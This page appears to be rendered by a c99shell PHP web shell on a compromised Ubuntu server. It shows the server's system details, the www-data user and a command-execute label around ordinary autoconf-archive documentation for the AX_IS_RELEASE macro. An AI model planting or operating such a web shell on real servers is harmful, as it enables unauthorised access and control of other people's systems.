Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/autoconf-archive/html/ drwxr-xr-x | |
| Viewing file: Select action/file-type: Next: ax_java_check_class, Previous: ax_install_files, Up: The Macros ax_is_releaseSynopsisAX_IS_RELEASE(POLICY) DescriptionDetermine whether the code is being configured as a release, or from git. Set the ax_is_release variable to ’yes’ or ’no’. If building a release version, it is recommended that the configure script disable compiler errors and debug features, by conditionalising them on the ax_is_release variable. If building from git, these features should be enabled. The POLICY parameter specifies how ax_is_release is determined. It can take the following values: * git-directory: ax_is_release will be 'no' if a '.git' directory exists
* minor-version: ax_is_release will be 'no' if the minor version number
in $PACKAGE_VERSION is odd; this assumes
$PACKAGE_VERSION follows the 'major.minor.micro' scheme
* micro-version: ax_is_release will be 'no' if the micro version number
in $PACKAGE_VERSION is odd; this assumes
$PACKAGE_VERSION follows the 'major.minor.micro' scheme
* dash-version: ax_is_release will be 'no' if there is a dash '-'
in $PACKAGE_VERSION, for example 1.2-pre3, 1.2.42-a8b9
or 2.0-dirty (in particular this is suitable for use
with git-version-gen)
* always: ax_is_release will always be 'yes'
* never: ax_is_release will always be 'no'
Other policies may be added in future. Source CodeDownload the latest version of ax_is_release.m4 or browse the macro’s revision history. LicenseCopyright © 2015 Philip Withnall philip@tecnocode.co.uk Copying and distribution of this file, with or without modification, are permitted in any medium without royalty provided the copyright notice and this notice are preserved. |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]-- |